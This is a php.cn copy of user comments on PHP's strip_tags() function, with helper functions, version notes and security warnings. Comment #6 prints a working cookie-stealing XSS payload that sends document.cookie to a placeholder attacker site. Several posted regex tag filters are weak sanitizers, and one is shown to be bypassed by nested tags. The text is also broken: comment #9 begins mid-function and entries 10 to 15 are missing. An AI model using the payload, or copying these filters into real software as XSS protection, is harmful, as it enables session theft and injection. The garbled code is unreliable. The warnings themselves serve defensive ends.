© This document was published using the php.cn manual.
[#1] denis dot for dot spam at gmail dot com [2015-11-10 13:36:43]
My function removes specific tags together with their content, and it can also target elements that carry a given attribute.
<?php
// Removes each listed tag together with its content.
// A plain string entry names a tag; an array entry is array( tag, attribute string ).
function strip_selected_tags_content( $text, $tags = array() ) {
    foreach ( $tags as $key => $val ) {
        if ( ! is_array( $val ) ) {
            $text = preg_replace( '/<' . $val . '[^>]*>([\s\S]*?)<\/' . $val . '[^>]*>/', '', $text );
        } else {
            $text = preg_replace( '/<' . $val[0] . ' ' . $val[1] . '[^>]*>([\s\S]*?)<\/' . $val[0] . '[^>]*>/', '', $text );
        }
    }
    return $text;
}
?>
example:
<?php
$clear = array('social',
'script',
'noindex',
'time',
'header',
array( 'div', 'class="tags"' ),
array( 'div', 'class="box_comments"' ),
array( 'p', 'class="form-submit"' ),
array( 'div', 'class="comment-form-comment"' )
);
$text = '<preheader>image article</preheader>
<header>nnnnn</header>
<social>fb code, google code etc...</social>
etc....
<p class="text">
bla-bla bla-blabla-bla bla-blabla-bla bla-bla
</p>
<div>sdasda</div>
<div class="tags">true code, that code</div>
<div class="comment-form-comment"> comment form on blog</div>
';
echo strip_selected_tags_content($text, $clear);
?>
Output:
<preheader>image article</preheader>
etc....
<p class="text">
bla-bla bla-blabla-bla bla-blabla-bla bla-bla
</p>
<div>sdasda</div>
[#2] Dr. Gianluigi "Zane" Zanettini [2015-10-22 07:52:37]
A word of caution. strip_tags() can actually be used for input validation as long as you remove ALL tags. As soon as you accept even a single tag (via the second parameter), you open a security hole such as this:
<acceptedTag onLoad="javascript:malicious()" />
Also, regexing away attributes or code blocks is really not the right solution. For effective input validation when strip_tags() has to accept even a single tag, HTML Purifier (http://htmlpurifier.org/) is the way to go.
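As a rough illustration of the point above, the following sketch compares allowing one tag with removing every tag. The helper name plain_text_only() is hypothetical and not part of PHP; it only combines strip_tags() and htmlspecialchars().

```php
<?php
// Hypothetical helper (not part of PHP): drop every tag, then escape the rest for HTML output.
function plain_text_only($input) {
    $text = strip_tags($input);   // no second argument, so no tag survives
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

$payload = '<acceptedTag onLoad="javascript:malicious()" />Hello';

// Allowing the tag keeps its attributes, event handlers included.
echo strip_tags($payload, '<acceptedTag>'), "\n";

// Removing every tag leaves only the text.
echo plain_text_only($payload), "\n";
```

This only covers the case where no markup at all is needed. When some tags must be kept, the note above points to HTML Purifier instead.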
[#3] doug at exploittheweb dot com [2015-08-11 10:17:29]
"5.3.4 strip_tags() no longer strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags."
This is poorly worded.
The above seems to be saying that, since 5.3.4, if you don't specify "<br/>" in allowable_tags then "<br/>" will not be stripped... but that's not actually what they're trying to say.
What it means is, in versions prior to 5.3.4, it "strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags", and that since 5.3.4 this is no longer the case.
So what reads as "no longer strips self-closing tags (unless the self-closing XHTML tag is also given in allowable_tags)" is actually saying "no longer (strips self-closing tags unless the self-closing XHTML tag is also given in allowable_tags)".
i.e.
pre-5.3.4: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br>' // strips <br/> because it wasn't explicitly specified in allowable_tags
5.3.4 and later: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br><br/>' // does not strip <br/> because PHP matches it with <br> in allowable_tags
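To check which of the two behaviours a given installation shows, a small sketch like the following can be run. It relies only on strip_tags() and the PHP_VERSION constant; the messages are illustrative wording, not official terminology.

```php
<?php
// Run the same call as in the note above on the current PHP version.
$result = strip_tags('Hello World<br><br/>', '<br>');

echo 'PHP ', PHP_VERSION, ': ', $result, "\n";

if ($result === 'Hello World<br><br/>') {
    // <br/> was kept because it is matched with <br> in allowable_tags
    echo "behaviour of 5.3.4 and later\n";
} else {
    // <br/> was removed because it was not listed explicitly
    echo "behaviour before 5.3.4\n";
}
```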
[#4] valentin dot boschatel at evalandgo dot com [2015-05-26 09:41:57]
Hi,
I have a problem with this function. I want to use the < symbol in my text, but it does not work when another character is stuck directly to the symbol.
Example:
<?php
$test = '<p><span style="color: #ff0000; background-color: #000000;">Complex</span> <span style="font-family: impact,chicago;">text <50% </span> <a href="http://exempledomain.com/"><em>with</em></a> <span style="font-size: 36pt;"><strong>tags</strong></span></p>';
echo strip_tags($test);
// Outputs : Complex text
?>
I made a function for this:
<?php
function strip_tags_review($str, $allowable_tags = '') {
    // Collect the tag names listed in $allowable_tags
    preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($allowable_tags), $tags);
    $tags = array_unique($tags[1]);
    if(is_array($tags) AND count($tags) > 0) {
        $pattern = '@<(?!(?:' . implode('|', $tags) . ')\b)(\w+)\b.*?>(.*?)</\1>@i';
    }
    else {
        $pattern = '@<(\w+)\b.*?>(.*?)</\1>@i';
    }
    // Replace each matched element with its content, then repeat while matches remain
    $str = preg_replace($pattern, '$2', $str);
    return preg_match($pattern, $str) ? strip_tags_review($str, $allowable_tags) : $str;
}
echo strip_tags_review($test);
// Outputs: Complex text <50% with tags
echo strip_tags_review($test, '<a>');
// Outputs: Complex text <50% <a href="http://exempledomain.com/">with</a> tags
?>
[#5] fernando at zauber dot es [2014-11-10 23:45:33]
As you probably know, the native function strip_tags() doesn't work very well with malformed HTML when you use the allowed tags parameter.
This is a very simple but effective function to remove HTML tags. It takes a list (array) of allowed tags as its second parameter:
<?php
function flame_strip_tags($html, $allowed_tags=array()) {
    // Normalize the allowed tag names to lowercase for comparison
    $allowed_tags=array_map('strtolower',$allowed_tags);
    // Keep a tag only when its name is in the allowed list
    $rhtml=preg_replace_callback('/<\/?([^>\s]+)[^>]*>/i', function ($matches) use (&$allowed_tags) {
        return in_array(strtolower($matches[1]),$allowed_tags)?$matches[0]:'';
    },$html);
    return $rhtml;
}
?>
The function works reasonably well with invalid or badly formatted HTML.
Use:
<?php
$allowed_tags=array("h1","a");
$html=<<<EOD
<h1>Example</h1>
<dt><a href='/manual/en/getting-started.php'>Getting Started</a></dt>
<dd><a href='/manual/en/introduction.php'>Introduction</a></dd>
<dd><a href='/manual/en/tutorial.php'>A simple tutorial</a></dd>
<dt><a href='/manual/en/langref.php'>Language Reference</a></dt>
<dd><a href='/manual/en/language.basic-syntax.php'>Basic syntax</a></dd>
<dd><a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a></dd>
</dl>
EOD;
echo flame_strip_tags($html,$allowed_tags);
?>
The output will be:
<h1>Example</h1>
<a href='/manual/en/getting-started.php'>Getting Started</a>
<a href='/manual/en/introduction.php'>Introduction</a>
<a href='/manual/en/tutorial.php'>A simple tutorial</a>
<a href='/manual/en/langref.php'>Language Reference</a>
<a href='/manual/en/language.basic-syntax.php'>Basic syntax</a>
<a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a>
[#6] bnt dot gloria at outlook dot com [2014-07-10 15:52:56]
With allowable_tags, strip_tags() is not safe.
<?php
$str= "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";
$str= strip_tags($str, '<p>');
echo $str; // DISPLAY: <p onmouseover="window.location='http://www.theBad.com/?cookie='+document.cookie;"> don't mouseover </p>
?>
[#7] pietro777 [2014-06-06 20:20:45]
$data = '<br>Each<br/>New<br />Line';
$new = strip_tags($data, '<br />||<br/>||<br>');
var_dump($new); // OUTPUTS string(26) "<br>Each<br/>New<br />Line"
[#8] Kenji [2014-04-24 14:11:39]
A word of warning!!
Do NOT use the regex posted by "admin at automapit dot com". It's broken:
"lalala <b<b>> lala </b<b>>"
will be stripped into
"lalala <b> lala </b>"
I CANNOT overstate the severity of the security issues you are introducing with such code! Don't use it, stay safe.
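The failure can be reproduced with the tag-stripping pattern from html2txt() on its own. This is a minimal sketch; the variable names are illustrative.

```php
<?php
// The "Strip out HTML tags" pattern from html2txt(), applied in a single pass.
$pattern = '@<[\/\!]*?[^<>]*?>@si';
$input   = 'lalala <b<b>> lala </b<b>>';

// Only the inner <b> of each nested pair matches, so the outer characters
// are left behind and join up into a new, valid-looking tag.
$once = preg_replace($pattern, '', $input);

echo $once, "\n"; // lalala <b> lala </b>
```

The pattern cannot match across a nested "<", which is why one pass over such input leaves markup in the result.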
[#9] andy [2014-03-06 15:33:38]
<?php
/#s', '', $text, 'm');
}
//introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be
//'<1' becomes '< 1'(note: somewhat application specific)
$text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);
$text = strip_tags($text, $allowed_tags);
//eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one
$text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);
//strip out inline css and simplify style tags
$search = array('#<(strong|b)[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)[^>]*>(.*?)</(em|i)>#isu', '#<u[^>]*>(.*?)</u>#isu');
$replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');
$text = preg_replace($search, $replace, $text);
//on some of the ?newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears
//that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains
//some MS Style Definitions - this last bit gets rid of any leftover comments */
$num_matches = preg_match_all("/\<!--/u", $text, $matches);
if($num_matches){
$text = preg_replace('/\<!--(.)*--\>/isu', '', $text);
}
return $text;
}
?>
[#16] brettz9 AAT yah [2009-04-05 08:10:58]
Works on the shortened <?...?> syntax, and thus will also remove XML processing instructions.
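A quick sketch of this behaviour, using made-up sample strings:

```php
<?php
// PHP blocks and XML processing instructions are removed along with HTML tags.
$with_php = 'before<?php echo 1; ?>after';
$with_xml = 'before<?xml version="1.0"?>after';

echo strip_tags($with_php), "\n"; // beforeafter
echo strip_tags($with_xml), "\n"; // beforeafter
```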
[#17] kai at froghh dot de [2009-03-06 08:45:05]
A function that decides whether < is the start of a tag or a less-than / less-than-or-equal sign:
<?php
function lt_replace($str){
    // Escape "<" when the next character is not a letter
    return preg_replace("/<([^[:alpha:]])/", '&lt;\\1', $str);
}
?>
It is meant to be used before strip_tags().
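One caveat: the character class [^[:alpha:]] in lt_replace() also matches the "/" of a closing tag, so a closing tag such as </span> would be treated as a less-than sign as well. A possible variant is sketched below. The name escape_stray_lt() is hypothetical, and the list of characters treated as "can start a tag" is an assumption for illustration.

```php
<?php
// Hypothetical variant of lt_replace(): escape "<" only when it cannot start
// a tag, a closing tag, a comment/doctype, or a processing instruction.
function escape_stray_lt($str) {
    return preg_replace('/<(?![a-zA-Z\/!?])/', '&lt;', $str);
}

$text = 'text <50% </span> and 1 < 2';
$safe = escape_stray_lt($text);

echo $safe, "\n";             // text &lt;50% </span> and 1 &lt; 2
echo strip_tags($safe), "\n"; // text &lt;50%  and 1 &lt; 2
```

The escaped string can be passed to strip_tags() afterwards, and the &lt; entities survive because they are not tags.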
[#18] CEO at CarPool2Camp dot org [2009-02-17 11:10:27]
Note the different outputs from different versions of the same tag:
<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new = strip_tags($data, '<br>');
var_dump($new); // OUTPUTS string(21) "<br>EachNew<br />Line"
?>
<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new = strip_tags($data, '<br/>');
var_dump($new); // OUTPUTS string(16) "Each<br/>NewLine"
?>
<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new = strip_tags($data, '<br />');
var_dump($new); // OUTPUTS string(11) "EachNewLine"
?>
[#19] mariusz.tarnaski at wp dot pl [2008-11-12 08:05:25]
Hi. I made a function that removes the HTML tags along with their contents:
Function:
<?php
function strip_tags_content($text, $tags = '', $invert = FALSE) {
    preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);
    $tags = array_unique($tags[1]);
    if(is_array($tags) AND count($tags) > 0) {
        if($invert == FALSE) {
            return preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);
        }
        else {
            return preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);
        }
    }
    elseif($invert == FALSE) {
        return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
    }
    return $text;
}
?>
Sample text:
$text = '<b>sample</b> text with <div>tags</div>';
Result for strip_tags($text):
sample text with tags
Result for strip_tags_content($text):
text with
Result for strip_tags_content($text, '<b>'):
<b>sample</b> text with
Result for strip_tags_content($text, '<b>', TRUE):
text with <div>tags</div>
I hope someone finds it useful :)
[#20] admin at automapit dot com [2006-08-09 10:01:54]
<?php
function html2txt($document){
    // Script and style blocks are removed before the generic tag pattern runs;
    // otherwise only their tags are stripped and their contents stay in the text.
    $search = array('@<script[^>]*?>.*?</script>@si',  // Strip out javascript
                    '@<style[^>]*?>.*?</style>@si',    // Strip style blocks with their contents
                    '@<![\s\S]*?--[ \t\n\r]*>@',       // Strip multi-line comments including CDATA
                    '@<[\/\!]*?[^<>]*?>@si'            // Strip out HTML tags
    );
    $text = preg_replace($search, '', $document);
    return $text;
}
?>
This function turns HTML into text: it strips tags, comments spanning multiple lines (including CDATA), and anything else that gets in its way.
It's a Frankenstein function I made from bits picked up on my travels through the web. Thanks to the many who have unwittingly contributed!
[#21] cesar at nixar dot org [2006-03-07 11:44:53]
Here is a recursive function for strip_tags(), like the one shown on the stripslashes manual page.
<?php
// Applies strip_tags() to a value, descending into nested arrays
function strip_tags_deep($value)
{
    return is_array($value) ?
        array_map('strip_tags_deep', $value) :
        strip_tags($value);
}
// Example
$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));
$array = strip_tags_deep($array);
// Output
print_r($array);
?>
[#22] salavert at~ akelos [2006-02-13 02:21:13]
<?php
// Removes only the given tags and keeps their content.
// Tags can be passed as an array or as additional string arguments.
function strip_selected_tags($text, $tags = array())
{
    $args = func_get_args();
    $text = array_shift($args);
    $tags = func_num_args() > 2 ? array_diff($args,array($text)) : (array)$tags;
    foreach ($tags as $tag){
        if(preg_match_all('/<'.$tag.'[^>]*>(.*)<\/'.$tag.'>/iU', $text, $found)){
            $text = str_replace($found[0],$found[1],$text);
        }
    }
    return $text;
}
?>
Hope you find it useful,
Jose Salavert